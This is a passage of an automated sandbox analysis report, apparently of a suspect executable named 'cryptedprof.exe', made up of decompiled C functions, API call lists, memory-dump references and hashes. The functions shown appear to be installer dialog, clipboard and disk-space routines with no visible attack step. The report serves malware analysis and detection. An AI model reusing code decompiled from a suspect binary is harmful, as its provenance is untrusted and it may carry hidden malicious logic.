                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                        • Instruction ID: 65ef4e0bd98581bd1f6bd632b42787c8420692956f3b06be75fa4a484c2a9a78
                                                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                        • Instruction Fuzzy Hash: FFE08C3220125AABEF119F60CC00AEB3B6CFB04361F004433FAA4E3140E230E9208BE4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040343E, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040343E(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                        0x0040344c
                                                                                        0x00403452

                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                        • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                                        • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                        • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 004054B2, Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 96%
                                                                                        			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a8b8;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ec0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f448, 8);
							__eflags =  *0x42f4ec - _t150;
							if( *0x42f4ec == _t150) {
								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
							}
							E004042AA(1);
							goto L25;
						}
						 *0x429c88 = 2;
						E004042AA(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404338(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ec10, _t150);
						ShowWindow(_v8, 8);
						E00404306(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f454;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ec10 = GetDlgItem(_a4, 0x403);
				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec24 = _t128;
				_v8 = _t128;
				E00404306( *0x42ec10);
				 *0x42ec14 = E00404BF7(4);
				 *0x42ec2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D1(_a4);
				if(( *0x42f45c & 0x00000003) != 0) {
					ShowWindow( *0x42ec10, _t150);
					if(( *0x42f45c & 0x00000002) != 0) {
						 *0x42ec10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404306( *0x42ec08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f45c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                                                        0x004054b8
                                                                                        0x004054c0
                                                                                        0x004054c3
                                                                                        0x004054cb
                                                                                        0x004054ce
                                                                                        0x0040565d
                                                                                        0x00405663
                                                                                        0x00405687
                                                                                        0x00405687
                                                                                        0x00405693
                                                                                        0x00405699
                                                                                        0x004056bb
                                                                                        0x004056bb
                                                                                        0x004056c1
                                                                                        0x00405716
                                                                                        0x00405716
                                                                                        0x00405719
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040571b
                                                                                        0x0040571e
                                                                                        0x00405721
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040572b
                                                                                        0x00405731
                                                                                        0x00405733
                                                                                        0x00405736
                                                                                        0x00405833
                                                                                        0x00000000
                                                                                        0x00405833
                                                                                        0x00405745
                                                                                        0x00405751
                                                                                        0x0040575a
                                                                                        0x00405761
                                                                                        0x00405765
                                                                                        0x00405768
                                                                                        0x00405771
                                                                                        0x00405777
                                                                                        0x0040577a
                                                                                        0x0040577a
                                                                                        0x0040578a
                                                                                        0x00405790
                                                                                        0x00405793
                                                                                        0x0040579e
                                                                                        0x0040579e
                                                                                        0x0040579f
                                                                                        0x004057a2
                                                                                        0x004057a9
                                                                                        0x004057b0
                                                                                        0x004057b8
                                                                                        0x004057b8
                                                                                        0x004057c6
                                                                                        0x004057cc
                                                                                        0x004057cf
                                                                                        0x004057cf
                                                                                        0x004057d6
                                                                                        0x004057dc
                                                                                        0x004057e5
                                                                                        0x004057ec
                                                                                        0x004057f5
                                                                                        0x004057f7
                                                                                        0x004057fa
                                                                                        0x00405809
                                                                                        0x0040580b
                                                                                        0x0040580e
                                                                                        0x0040580f
                                                                                        0x00405812
                                                                                        0x00405813
                                                                                        0x00405814
                                                                                        0x00405814
                                                                                        0x0040581c
                                                                                        0x00405827
                                                                                        0x0040582d
                                                                                        0x0040582d
                                                                                        0x00000000
                                                                                        0x00405793
                                                                                        0x004056c3
                                                                                        0x004056c9
                                                                                        0x004056f7
                                                                                        0x004056f9
                                                                                        0x004056ff
                                                                                        0x0040570a
                                                                                        0x0040570a
                                                                                        0x00405711
                                                                                        0x00000000
                                                                                        0x00405711
                                                                                        0x004056cd
                                                                                        0x004056d7
                                                                                        0x00000000
                                                                                        0x0040569b
                                                                                        0x0040569b
                                                                                        0x004056a1
                                                                                        0x004056dc
                                                                                        0x00000000
                                                                                        0x004056e3
                                                                                        0x004056aa
                                                                                        0x004056b1
                                                                                        0x004056b6
                                                                                        0x00000000
                                                                                        0x004056b6
                                                                                        0x00405699
                                                                                        0x004054d4
                                                                                        0x004054d8
                                                                                        0x004054e0
                                                                                        0x004054e4
                                                                                        0x004054e7
                                                                                        0x004054ea
                                                                                        0x004054ed
                                                                                        0x004054f0
                                                                                        0x004054f1
                                                                                        0x004054f2
                                                                                        0x0040550b
                                                                                        0x0040550e
                                                                                        0x00405518
                                                                                        0x00405527
                                                                                        0x0040552f
                                                                                        0x00405537
                                                                                        0x0040553c
                                                                                        0x0040553f
                                                                                        0x0040554b
                                                                                        0x00405554
                                                                                        0x0040555d
                                                                                        0x0040557f
                                                                                        0x00405585
                                                                                        0x00405596
                                                                                        0x0040559b
                                                                                        0x004055a9
                                                                                        0x004055b7
                                                                                        0x004055b7
                                                                                        0x004055bc
                                                                                        0x004055ca
                                                                                        0x004055ca
                                                                                        0x004055cf
                                                                                        0x004055d2
                                                                                        0x004055d7
                                                                                        0x004055e3
                                                                                        0x004055ec
                                                                                        0x004055f9
                                                                                        0x00405608
                                                                                        0x004055fb
                                                                                        0x00405600
                                                                                        0x00405600
                                                                                        0x00405614
                                                                                        0x00405614
                                                                                        0x00405628
                                                                                        0x00405631
                                                                                        0x0040563a
                                                                                        0x0040564a
                                                                                        0x00405656
                                                                                        0x00405656
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetDlgItem.USER32 ref: 00405511
                                                                                        • GetDlgItem.USER32 ref: 00405520
                                                                                        • GetClientRect.USER32 ref: 0040555D
                                                                                        • GetSystemMetrics.USER32 ref: 00405564
                                                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405585
                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405596
                                                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 004055A9
                                                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 004055B7
                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055CA
                                                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055EC
                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405600
                                                                                        • GetDlgItem.USER32 ref: 00405621
                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405631
                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040564A
                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405656
                                                                                        • GetDlgItem.USER32 ref: 0040552F
                                                                                          • Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314
                                                                                        • GetDlgItem.USER32 ref: 00405672
                                                                                        • CreateThread.KERNEL32 ref: 00405680
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405687
                                                                                        • ShowWindow.USER32(00000000), ref: 004056AA
                                                                                        • ShowWindow.USER32(?,00000008), ref: 004056B1
                                                                                        • ShowWindow.USER32(00000008), ref: 004056F7
                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040572B
                                                                                        • CreatePopupMenu.USER32 ref: 0040573C
                                                                                        • AppendMenuA.USER32 ref: 00405751
                                                                                        • GetWindowRect.USER32 ref: 00405771
                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057C6
                                                                                        • OpenClipboard.USER32(00000000), ref: 004057D6
                                                                                        • EmptyClipboard.USER32 ref: 004057DC
                                                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E5
                                                                                        • GlobalLock.KERNEL32 ref: 004057EF
                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405803
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040581C
                                                                                        • SetClipboardData.USER32 ref: 00405827
                                                                                        • CloseClipboard.USER32 ref: 0040582D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 590372296-0
                                                                                        • Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                                        • Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
                                                                                        • Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                                        • Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404763, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 78%
                                                                                        			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a090;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040594D(0x3fb, _t146);
					E00406528(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040594D(0x3fb, _t146);
							if(E00405CD3(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E0040624D(0x429888, _t146);
							_t87 = E00406656(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624D(0x429888, _t146);
								_t89 = E00405C7E(0x429888);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429888) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C2C(0x429888);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429888) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BF7(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ec1c; // 0x6301d0
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BDF(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429878);
									} else {
										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f504 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042F3(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
									E004046BC();
								}
								 *0x42a8a8 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a8b8;
							_v60 = E00404AB4;
							_v56 = _t146;
							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BE5(_t146);
								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
										lstrcatA(_t146, 0x42e3e0);
									}
								}
								 *0x42a8a8 =  *0x42a8a8 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
						E00405BE5(_t146);
					}
					 *0x42ec18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D1(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D1(_t166);
					E00404306(_t165);
					_t138 = E00406656(8);
					if(_t138 == 0) {
						L53:
						return E00404338(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                                                        0x00404763
                                                                                        0x00404769
                                                                                        0x0040476f
                                                                                        0x0040477c
                                                                                        0x0040478a
                                                                                        0x0040478d
                                                                                        0x00404795
                                                                                        0x0040479b
                                                                                        0x0040479b
                                                                                        0x004047a7
                                                                                        0x004047aa
                                                                                        0x00404818
                                                                                        0x0040481f
                                                                                        0x004048f6
                                                                                        0x004048fd
                                                                                        0x0040490c
                                                                                        0x0040490c
                                                                                        0x00404910
                                                                                        0x0040491a
                                                                                        0x00404927
                                                                                        0x00404929
                                                                                        0x00404929
                                                                                        0x00404937
                                                                                        0x0040493e
                                                                                        0x00404945
                                                                                        0x00404948
                                                                                        0x0040497f
                                                                                        0x00404981
                                                                                        0x00404987
                                                                                        0x0040498c
                                                                                        0x00404990
                                                                                        0x00404992
                                                                                        0x00404992
                                                                                        0x004049ae
                                                                                        0x00000000
                                                                                        0x004049b0
                                                                                        0x004049b3
                                                                                        0x004049c1
                                                                                        0x004049c7
                                                                                        0x004049c8
                                                                                        0x004049cb
                                                                                        0x004049ce
                                                                                        0x00000000
                                                                                        0x004049ce
                                                                                        0x0040494a
                                                                                        0x0040494c
                                                                                        0x00404950
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404952
                                                                                        0x00404952
                                                                                        0x0040495f
                                                                                        0x00404964
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404968
                                                                                        0x0040496a
                                                                                        0x0040496a
                                                                                        0x00404972
                                                                                        0x00404974
                                                                                        0x00404977
                                                                                        0x0040497a
                                                                                        0x0040497d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040497d
                                                                                        0x004049da
                                                                                        0x004049e4
                                                                                        0x004049e7
                                                                                        0x004049ea
                                                                                        0x004049f1
                                                                                        0x004049f1
                                                                                        0x004049f3
                                                                                        0x004049f3
                                                                                        0x004049f8
                                                                                        0x004049fa
                                                                                        0x00404a02
                                                                                        0x00404a09
                                                                                        0x00404a0b
                                                                                        0x00404a16
                                                                                        0x00404a16
                                                                                        0x00404a0b
                                                                                        0x00404a1d
                                                                                        0x00404a26
                                                                                        0x00404a30
                                                                                        0x00404a38
                                                                                        0x00404a53
                                                                                        0x00404a3a
                                                                                        0x00404a43
                                                                                        0x00404a43
                                                                                        0x00404a38
                                                                                        0x00404a58
                                                                                        0x00404a5d
                                                                                        0x00404a62
                                                                                        0x00404a6b
                                                                                        0x00404a6b
                                                                                        0x00404a74
                                                                                        0x00404a76
                                                                                        0x00404a76
                                                                                        0x00404a82
                                                                                        0x00404a8a
                                                                                        0x00404a94
                                                                                        0x00404a94
                                                                                        0x00404a99
                                                                                        0x00000000
                                                                                        0x00404a99
                                                                                        0x00404948
                                                                                        0x004048ff
                                                                                        0x00404906
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404906
                                                                                        0x00404825
                                                                                        0x0040482e
                                                                                        0x00404848
                                                                                        0x0040484d
                                                                                        0x00404857
                                                                                        0x0040485e
                                                                                        0x0040486a
                                                                                        0x0040486d
                                                                                        0x00404870
                                                                                        0x00404877
                                                                                        0x0040487f
                                                                                        0x00404882
                                                                                        0x00404886
                                                                                        0x0040488d
                                                                                        0x00404895
                                                                                        0x004048ef
                                                                                        0x00404897
                                                                                        0x00404898
                                                                                        0x0040489f
                                                                                        0x004048a9
                                                                                        0x004048b1
                                                                                        0x004048be
                                                                                        0x004048d2
                                                                                        0x004048d6
                                                                                        0x004048d6
                                                                                        0x004048d2
                                                                                        0x004048db
                                                                                        0x004048e8
                                                                                        0x004048e8
                                                                                        0x00404895
                                                                                        0x00000000
                                                                                        0x0040484d
                                                                                        0x0040483b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404841
                                                                                        0x00000000
                                                                                        0x004047ac
                                                                                        0x004047b9
                                                                                        0x004047c2
                                                                                        0x004047cf
                                                                                        0x004047cf
                                                                                        0x004047d6
                                                                                        0x004047dc
                                                                                        0x004047e5
                                                                                        0x004047e8
                                                                                        0x004047eb
                                                                                        0x004047f3
                                                                                        0x004047f6
                                                                                        0x004047f9
                                                                                        0x004047ff
                                                                                        0x00404806
                                                                                        0x0040480d
                                                                                        0x00404a9f
                                                                                        0x00404ab1
                                                                                        0x00404813
                                                                                        0x00404816
                                                                                        0x00000000
                                                                                        0x00404816
                                                                                        0x0040480d

                                                                                        APIs
                                                                                        • GetDlgItem.USER32 ref: 004047B2
                                                                                        • SetWindowTextA.USER32(00000000,?), ref: 004047DC
                                                                                        • SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404898
                                                                                        • lstrcmpiA.KERNEL32(Call,0042A8B8,00000000,?,?), ref: 004048CA
                                                                                        • lstrcatA.KERNEL32(?,Call), ref: 004048D6
                                                                                        • SetDlgItemTextA.USER32 ref: 004048E8
                                                                                          • Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960
                                                                                          • Part of subcall function 00406528: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\cryptedprof.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                                          • Part of subcall function 00406528: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                          • Part of subcall function 00406528: CharNextA.USER32(?,"C:\Users\user\Desktop\cryptedprof.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                                          • Part of subcall function 00406528: CharPrevA.USER32(?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                                        • GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C1
                                                                                          • Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                          • Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
                                                                                          • Part of subcall function 00404B1A: SetDlgItemTextA.USER32 ref: 00404BD3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
